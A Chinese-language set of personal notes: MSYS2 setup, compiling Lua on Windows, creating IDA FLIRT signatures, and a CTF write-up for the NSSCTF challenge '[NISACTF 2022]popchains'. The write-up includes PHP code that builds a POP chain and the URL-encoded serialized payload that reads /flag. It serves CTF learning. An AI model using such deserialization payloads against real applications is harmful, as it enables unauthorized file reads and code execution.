MSYS2 安装

下载地址:MSYS2

安装后换源,根目录 /etc/pacman.d/ 下分别找到 mirrorlist.mingw32mirrorlist.mingw64mirrorlist.msys

mirrorlist.mingw32添加: Server = http://mirrors.ustc.edu.cn/msys2/mingw/i686/

mirrorlist.mingw64添加: Server = http://mirrors.ustc.edu.cn/msys2/mingw/x86_64/

mirrorlist.msys添加: Server = http://mirrors.ustc.edu.cn/msys2/msys/$arch/

安装完成后执行命令(安装make)

1
pacman -S gcc make  mingw-w64-i686-gcc mingw-w64-x86_64-gcc vim base-devel pkg-config

然后测试一下是否安装好了

1
make -v

Lua 5.1.5在Windows下的编译

MSYS2编译好了后,执行

1
make mingw install local

image-20230412172404720

SIG文件制作及使用

以lua5.1为例,要编译成.lib文件,如下所示,先生成pat,再生产sig

1
2
pcf filename.lib filename.pat
sigmake filename.pat filename.sig

image-20230413154835602

然后将制作好的sig文件放入IDA/sig

IDA中,按Shift+F5或者在View(视窗) - Open subviews(打开子视窗) - Signatures(签名)

image-20230413155620392

然后Apply new signature(应用新的签名),找到刚添加的sig文件,发现成功应用。

QQ图片20230413160035

易语言在IDA中解除函数名称的限制

修改ida.cfg,去掉Block_CJK_Unified_Ideographs前面的注释

成功显示中文函数名

image-20230416222306939

POP链构造

题目: [NISACTF 2022]popchains | NSSCTF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
class Road_is_Long
{
    public $page;
    public $string;
}
class Try_Work_Hard
{
    protected  $var = "/flag";
}
class Make_a_Change
{
    public $effort;
}
 
$road1 = new Road_is_Long();
$road2 = new Road_is_Long();
$try = new Try_Work_Hard();
$make = new Make_a_Change();
 
$road1 -> page = $road2;
$road2 -> string = $make;
$make -> effort = $try;
 
$ser = serialize($road1);
echo urlencode($ser);

传入O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BN%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BN%3B%7D得到Flag